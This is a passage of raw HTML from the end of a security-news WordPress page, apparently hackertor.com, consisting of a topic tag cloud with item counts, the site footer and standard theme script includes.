10.560975609756pt;" aria-label="interview (203 items)">interview</a> <a href="https://hackertor.com/tag/iot/" class="tag-cloud-link tag-link-226 tag-link-position-14" style="font-size: 9.8780487804878pt;" aria-label="IoT (185 items)">IoT</a> <a href="https://hackertor.com/tag/kali-linux/" class="tag-cloud-link tag-link-21 tag-link-position-15" style="font-size: 11.414634146341pt;" aria-label="Kali Linux (226 items)">Kali Linux</a> <a href="https://hackertor.com/tag/linux/" class="tag-cloud-link tag-link-63 tag-link-position-16" style="font-size: 21.658536585366pt;" aria-label="Linux (915 items)">Linux</a> <a href="https://hackertor.com/tag/mac/" class="tag-cloud-link tag-link-64 tag-link-position-17" style="font-size: 15.341463414634pt;" aria-label="Mac (391 items)">Mac</a> <a href="https://hackertor.com/tag/malware/" class="tag-cloud-link tag-link-75 tag-link-position-18" style="font-size: 19.609756097561pt;" aria-label="Malware (690 items)">Malware</a> <a href="https://hackertor.com/tag/microsoft/" class="tag-cloud-link tag-link-221 tag-link-position-19" style="font-size: 9.3658536585366pt;" aria-label="Microsoft (171 items)">Microsoft</a> <a href="https://hackertor.com/tag/mobile-security/" class="tag-cloud-link tag-link-44 tag-link-position-20" style="font-size: 11.243902439024pt;" aria-label="Mobile Security (224 items)">Mobile Security</a> <a href="https://hackertor.com/tag/networking/" class="tag-cloud-link tag-link-214 tag-link-position-21" style="font-size: 9.5365853658537pt;" aria-label="Networking (178 items)">Networking</a> <a href="https://hackertor.com/tag/news/" class="tag-cloud-link tag-link-127 tag-link-position-22" style="font-size: 10.219512195122pt;" aria-label="News (193 items)">News</a> <a href="https://hackertor.com/tag/open-source/" class="tag-cloud-link tag-link-289 tag-link-position-23" style="font-size: 9.5365853658537pt;" aria-label="Open Source (175 items)">Open Source</a> <a href="https://hackertor.com/tag/other/" class="tag-cloud-link tag-link-201 tag-link-position-24" style="font-size: 8.3414634146341pt;" aria-label="Other (150 items)">Other</a> <a href="https://hackertor.com/tag/pauls-security-weekly/" class="tag-cloud-link tag-link-32 tag-link-position-25" style="font-size: 11.585365853659pt;" aria-label="Paul's Security Weekly (236 items)">Paul's Security Weekly</a> <a href="https://hackertor.com/tag/paul-asadoorian/" class="tag-cloud-link tag-link-128 tag-link-position-26" style="font-size: 13.80487804878pt;" aria-label="paul asadoorian (313 items)">paul asadoorian</a> <a href="https://hackertor.com/tag/penetration-test/" class="tag-cloud-link tag-link-15 tag-link-position-27" style="font-size: 14.829268292683pt;" aria-label="Penetration Test (359 items)">Penetration Test</a> <a href="https://hackertor.com/tag/penetration-testing/" class="tag-cloud-link tag-link-48 tag-link-position-28" style="font-size: 15.512195121951pt;" aria-label="Penetration Testing (398 items)">Penetration Testing</a> <a href="https://hackertor.com/tag/phishing/" class="tag-cloud-link tag-link-496 tag-link-position-29" style="font-size: 8.1707317073171pt;" aria-label="Phishing (146 items)">Phishing</a> <a href="https://hackertor.com/tag/powershell/" class="tag-cloud-link tag-link-512 tag-link-position-30" style="font-size: 11.073170731707pt;" aria-label="powershell (220 items)">powershell</a> <a href="https://hackertor.com/tag/privacy/" class="tag-cloud-link tag-link-89 tag-link-position-31" style="font-size: 17.048780487805pt;" aria-label="Privacy (485 items)">Privacy</a> <a href="https://hackertor.com/tag/python/" class="tag-cloud-link tag-link-291 tag-link-position-32" style="font-size: 18.073170731707pt;" aria-label="Python (563 items)">Python</a> <a href="https://hackertor.com/tag/rblackhat-2/" class="tag-cloud-link tag-link-2857 tag-link-position-33" style="font-size: 20.634146341463pt;" aria-label="r/blackhat (786 items)">r/blackhat</a> <a href="https://hackertor.com/tag/ransomware/" class="tag-cloud-link tag-link-637 tag-link-position-34" style="font-size: 10.560975609756pt;" aria-label="ransomware (201 items)">ransomware</a> <a href="https://hackertor.com/tag/scan/" class="tag-cloud-link tag-link-292 tag-link-position-35" style="font-size: 9.1951219512195pt;" aria-label="Scan (168 items)">Scan</a> <a href="https://hackertor.com/tag/scanner/" class="tag-cloud-link tag-link-67 tag-link-position-36" style="font-size: 9.8780487804878pt;" aria-label="Scanner (185 items)">Scanner</a> <a href="https://hackertor.com/tag/security/" class="tag-cloud-link tag-link-34 tag-link-position-37" style="font-size: 15.512195121951pt;" aria-label="security (399 items)">security</a> <a href="https://hackertor.com/tag/security-tools/" class="tag-cloud-link tag-link-40 tag-link-position-38" style="font-size: 8.6829268292683pt;" aria-label="Security Tools (159 items)">Security Tools</a> <a href="https://hackertor.com/tag/security-weekly/" class="tag-cloud-link tag-link-35 tag-link-position-39" style="font-size: 11.414634146341pt;" aria-label="security weekly (226 items)">security weekly</a> <a href="https://hackertor.com/tag/uncategorized/" class="tag-cloud-link tag-link-51 tag-link-position-40" style="font-size: 14.829268292683pt;" aria-label="Uncategorized (360 items)">Uncategorized</a> <a href="https://hackertor.com/tag/vulnerabilities/" class="tag-cloud-link tag-link-76 tag-link-position-41" style="font-size: 22pt;" aria-label="Vulnerabilities (954 items)">Vulnerabilities</a> <a href="https://hackertor.com/tag/vulnerability/" class="tag-cloud-link tag-link-2532 tag-link-position-42" style="font-size: 8.3414634146341pt;" aria-label="vulnerability (149 items)">vulnerability</a> <a href="https://hackertor.com/tag/webapps/" class="tag-cloud-link tag-link-14 tag-link-position-43" style="font-size: 15.512195121951pt;" aria-label="webapps (396 items)">webapps</a> <a href="https://hackertor.com/tag/web-security/" class="tag-cloud-link tag-link-90 tag-link-position-44" style="font-size: 18.585365853659pt;" aria-label="Web Security (599 items)">Web Security</a> <a href="https://hackertor.com/tag/windows/" class="tag-cloud-link tag-link-71 tag-link-position-45" style="font-size: 18.073170731707pt;" aria-label="Windows (563 items)">Windows</a></div> </aside></div><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="scroll-container"> <a href="#" class="scrolltop"><i class="fa fa-chevron-up"></i></a> </div> <div class="site-info container"> <a href="http://wordpress.org/" rel="nofollow">Proudly powered by WordPress</a><span class="sep"> | </span>Theme: <a href="http://themeisle.com/themes/amadeus/" rel="nofollow">Amadeus</a> by Themeisle. </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src='https://hackertor.com/wp-content/themes/amadeus/js/navigation.js?ver=20120206'></script> <script type='text/javascript' src='https://hackertor.com/wp-content/themes/amadeus/js/skip-link-focus-fix.js?ver=20130115'></script> <script type='text/javascript' src='https://hackertor.com/wp-includes/js/wp-embed.min.js?ver=65cb7bb5612ef0ba257f4be28dae4ccd'></script> </body> </html>